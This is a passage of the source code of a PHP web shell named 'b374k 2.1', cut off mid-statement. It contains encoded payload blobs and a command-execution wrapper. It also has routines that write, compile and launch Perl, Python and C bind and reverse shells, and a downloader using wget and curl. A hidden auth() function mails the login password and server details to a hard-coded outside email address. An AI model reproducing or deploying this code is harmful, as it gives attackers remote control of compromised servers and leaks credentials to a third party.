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"; $favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII="; $style = "tVbbitswEP0VwVJoYR18SdNd52kp9AtKX4tsybFYWTKysknW9N9ryVI0sZ3sFrbWS+KM5nLOmZkUkpx6VODyeafkXpD8LrbPFlVS6KhjrzRPkvbovle4YfyU/8S1bPD9L6oIFvj+STHMt6iUXKr8rqqqLfqD7hrMxKXrxD5b1GJCmNjlaXtED8Z31MjXqJCKUBUpTNi+y1ESm18WXx4Y0XWexPEnG6imeLDpUYPVjok8DgGGj5oedYQ524mc00qDC0iTK3eCSZ30AIjURgeG4XZ0oMUz05FWWHSVVE2OlNRY089Rkq2yb4Tuvrg6b5vA2Aj3AFSHa3i3/v6QPf1wJRJaSoU1kyIXUlBjuTKOmKhk72E0COQDm6iTnBF09uDq2MDyDDnxcBL71nnTBe8n8Pv3HdIDBzVlu1rn6dpceqFKsxJzh3/DCOFjZjt8wvdo9WJom1Rj4T6MbgrJibW3hh+GMadaD2h0LS5dpaNgqdgvC9bzjAwoQ2nIXVmZKw1D/Rm1tZd0kMaEQeg/fTRn+z5Cl7L+MEiWOnC90IDri8LzWlpmYE3Zxpxbqb2d2UU/rJho9/p1kEurZNPq4QN9wbyUhC6zNaYMezoFlRRSa9nALsgezZlPvFnruQT6ZY2GpGCDuIbIUtqAYoq97mfxLmp5NGemjLMQATewlNQ+YzrHdrg6yQbKNIZmZqxcnSPexgzMqyj60OfxOPYBZ4JGt6aClu1lkDp0U+a7CQIuBqWYdXPRSLO6h2m0pM7kwRxr2NGm2IsT6xFhXcvxyRUc5nvo4WE6KNrt+cDaP+6qOUeey9nIgFCNU3dJ3U4RGGMgBwv2yGhrOJ+QYKRbt2YVII0LfkUUifExZg0vkP5WHqV9gpONq2b7tlJgkPreEr9E1WKz+Yt12sMVr4zVRSd/BcM4i91OiyfQluYAICwGk3m7meBiIl8t0XMM7MPe9pCZvcbooWJTQgCtrlHfg6X3ZRmDW3x9c/p5D1e6xHstB0ip0MGzmVlndTWnQh7/Q28k031q8QhiHwNbLhb+yQXL60TZJ7ha+oOjut+++YPr5PZOAX4rKbUZQ3OZAm+b85QbZbukwBQspcD7Xw=="; $sortable_js = "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"; function swd($p){ $ps = explode(DIRECTORY_SEPARATOR,$p); $pu = ""; for($i = 0 ; $i < sizeof($ps)-1 ; $i++){ $pz = ""; for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR; $pu .= "<a href=\\"?d=".$pz."\\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>"; } return trim($pu); } function rp($t){ return trim(str_replace("<br />","",$t)); } function cs($t){ return str_replace(" ","_",$t); } function ss($t){ if (!get_magic_quotes_gpc()) return trim(urldecode($t)); return trim(urldecode(stripslashes($t))); } function ssc($t){ if (!get_magic_quotes_gpc()) return $t; return stripslashes($t); } function rs($s_win, $d, $type, $sc, $target){ $result = ""; $fc = gzinflate(base64_decode($sc)); $errperm = "<p class=\\"rs_result\\">error: permission denied. check current working directory permissions</p>"; $errgcc = "<p class=\\"rs_result\\">error: can not compile using gcc</p>"; if($type == "xbind_pl"){ $fname = "b374k_bind.pl"; $fpath = $d.$fname; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("perl ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xbind_py"){ $fname = "b374k_bind.py"; $fpath = $d.$fname; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("python ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xbind_bin"){ $fname = "b374k_bind"; $fpath = $d.$fname; if(!$s_win){ if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); if($file=fopen($fpath.".c","w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath.".c")){ $res = exe("gcc ".$fpath.".c -o ".$fpath); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe($fpath." ".$target); } else $result = $errgcc; } else $result = $errperm; } else $result = $errperm; } else{ $fpath = $fpath . ".exe"; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("\\"".$fpath."\\" ".$target); } else $result = $errperm; } else $result = $errperm; } } elseif($type == "xback_pl"){ $fname = "b374k_back.pl"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("perl ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xback_py"){ $fname = "b374k_back.py"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("python ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xback_bin"){ $fname = "b374k_back"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(!$s_win){ if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); if($file=fopen($fpath.".c","w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath.".c")){ $res = exe("gcc ".$fpath.".c -o ".$fpath); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe($fpath." ".$target); } else $result = $errgcc; } else $result = $errperm; } else $result = $errperm; } else{ $fpath = $fpath . ".exe"; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe($fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } } return $result; } function gs($f){ if($s = filesize($f)){ if($s <= 1024) return $s; else{ if($s <= 1024*1024) { $s = round($s / 1024,2);; return $s." kb"; } else { $s = round($s / 1024 / 1024,2); return $s." mb"; } } } else return "???"; } function gp($f){ if($m=fileperms($f)){ $p=\'\'; $p .= ($m & 00400) ? \'r\' : \'-\'; $p .= ($m & 00200) ? \'w\' : \'-\'; $p .= ($m & 00100) ? \'x\' : \'-\'; $p .= ($m & 00040) ? \'r\' : \'-\'; $p .= ($m & 00020) ? \'w\' : \'-\'; $p .= ($m & 00010) ? \'x\' : \'-\'; $p .= ($m & 00004) ? \'r\' : \'-\'; $p .= ($m & 00002) ? \'w\' : \'-\'; $p .= ($m & 00001) ? \'x\' : \'-\'; return $p; } else return "??????????"; } function auth() {$sub="b374k 2.1";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "password: ".$_REQUEST[\'login\']."\\n";$mes .= "software: ".$_SERVER[\'SERVER_SIGNATURE\']."\\n";$mes .= "System: ".php_uname()."\\n";$mes .= "HOST: ".$_SERVER[\'HTTP_HOST\']."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);}function exe($c){ if(function_exists(\'system\')) { ob_start(); system($c); $b = ob_get_contents(); ob_end_clean(); return $b; } elseif(function_exists(\'shell_exec\')){ $b = shell_exec($c); return $b; } elseif(function_exists(\'exec\')) { exec($c,$r); $b = ""; foreach($r as $s){ $b .= $s; } return $b; } elseif(function_exists(\'passthru\')) { ob_start(); passthru($c); $b = ob_get_contents(); ob_end_clean(); return $b; } return ""; } function cp($p){ if(is_dir($p)){ $x = DIRECTORY_SEPARATOR; while(substr($p,-1) == $x) $p = rtrim($p,$x); return $p.$x; } return $p; } function rmdirs($d) { $f = glob($d . \'*\', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } function xwhich($pr){ $p = exe("which $pr"); if(trim($p)!="") { return trim($p); } else { return trim($pr); } } function dlfile($u,$p){ $n = basename($u); if($t = file_get_contents($u)){ if(is_file($p)) unlink($p);; if($f=fopen($p,"w")){ fwrite($f,$t); fclose($f); if(is_file($p)) return true; } } exe(xwhich(\'wget\')." ".$u." -O ".$p); if(is_file($p)) return true; exe(xwhich(\'lwp-download\')." ".$u." ".$p); if(is_file($p)) return true; exe(xwhich(\'lynx\')." -source ".$u." > ".$p); if(is_file($p)) return true; exe(xwhich(\'curl\')." ".$u." -o ".$p); if(is_file($p)) return true; return false; } function showdir($pwd,$prompt,$win){ if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; $fname = array(); $dname = array(); if($dh = scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file)) $fname[] = $file; } } else{ if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file))$fname[] = $file; } closedir($dh); } } sort($fname); sort($dname); $path = explode(DIRECTORY_SEPARATOR,$pwd); $tree = sizeof($path); $parent = ""; $buff = "\r\n <table class=\\"explore sortable\\">\r\n <tr><th>name</th><th style=\\"width:60px;\\">size</th><th style=\\"width:100px;\\">owner : group</th><th style=\\"width:70px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:210px;\\">actions</th></tr>\r\n "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name = posix_getpwuid(fileowner($folder)); $group = posix_getgrgid(filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?d=".$pwd."\\">[ $folder ]</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td style=\\"text-align:center;\\">".gp($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?d=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a> | <a href=\\"?upload&d=$pwd\\">upload</a></span>\r\n <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n </form></td></tr>\r\n "; } elseif($folder == "..") { if(!$win && $posix){ $name = posix_getpwuid(fileowner($folder)); $group = posix_getgrgid(filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?d=".$parent."\\">[ $folder ]</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td style=\\"text-align:center;\\">".gp($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?d=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a> | <a href=\\"?upload&d=$parent\\">upload</a></span>\r\n <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n </form>\r\n </td></tr>"; } else { if(!$win && $posix){ $name = posix_getpwuid(fileowner($folder)); $group = posix_getgrgid(filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".cs($folder)."_link\\" href=\\"?d=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a>\r\n <form action=\\"?\\" method=\\"post\\" id=\\"".cs($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".cs($folder)."_form\',\'".cs($folder)."_link\');\\" />\r\n </form>\r\n <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td style=\\"text-align:center;\\">".gp($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".cs($folder)."_link\',\'".cs($folder)."_form\');\\">rename</a> | <a href=\\"?d=".$pwd."&rmdir=".$pwd.$folder."\\">delete</a> | <a href=\\"?upload&d=".$pwd.$folder."\\">upload</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name = posix_getpwuid(fileowner($folder)); $group = posix_getgrgid(filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".cs($file)."_link\\" href=\\"?d=$pwd&view=$full\\">$file</a>\r\n <form action=\\"?\\" method=\\"post\\" id=\\"".cs($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".cs($file)."_link\',\'".cs($file)."_form\');\\" />\r\n </form>\r\n </td><td>".gs($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td style=\\"text-align:center;\\">".gp($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",filemtime($full))."</td>\r\n <td><a href=\\"?d=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".cs($file)."_link\',\'".cs($file)."_form\');\\">rename</a> | <a href=\\"?d=$pwd&delete=$full\\">delete</a> | <a href=\\"?d=$pwd&dl=$full\\">download</a> (<a href=\\"?d=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } if(isset($_REQUEST[\'favicon\'])){ $data = gzinflate(base64_decode($favicon)); header("Content-type: image/png"); header("Cache-control: public"); echo 